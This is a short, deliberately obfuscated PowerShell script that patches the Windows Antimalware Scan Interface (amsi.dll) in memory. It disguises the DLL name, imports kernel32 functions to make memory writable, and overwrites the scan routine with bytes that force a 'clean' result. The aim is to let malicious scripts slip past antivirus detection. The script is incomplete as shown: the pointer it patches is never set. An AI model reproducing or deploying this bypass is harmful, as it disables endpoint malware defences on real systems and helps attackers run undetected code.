$test = Add-Type
$7amada = [System.Runtime.InteropServices.Marshal]
$ahh = @"
using System;
using System.Runtime.InteropServices;
public class afrcv {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool Virtual
"@


$hh = @"
Protect(IntPtr lpAddress, UIntPtr odwsuy, uint flNewProtect, out uint lpflOldProtect);
}
"@

$afrcv = $ahh+$hh

$test -TypeDefinition $afrcv
$wzqprfk = [afrcv]::LoadLibrary("$(('àmsî.'+'dll').NoRMAlize([chaR]([byte]0x46)+[cHAR](111+94-94)+[CHar](34+80)+[cHaR](109*91/91)+[CHaR]([bYTe]0x44)) -replace [chAR]([byte]0x5c)+[CHaR]([byTe]0x70)+[cHAR]([BYTe]0x7b)+[CHar]([ByTE]0x4d)+[cHAR]([BYTe]0x6e)+[ChAr](125+8-8))")

$p = 0
[afrcv]::VirtualProtect($npmjpz, [uint32]5, 0x40, [ref]$p)
$vxck = "0xB8"
$uixn = "0x57"
$bxny = "0x00"
$rxqr = "0x07"
$yzex = "0x80"
$gbrq = "0xC3"
$acyyr = [Byte[]] ($vxck,$uixn,$bxny,$rxqr,+$yzex,+$gbrq)
$7amada::Copy($acyyr, 0, $npmjpz, 6)
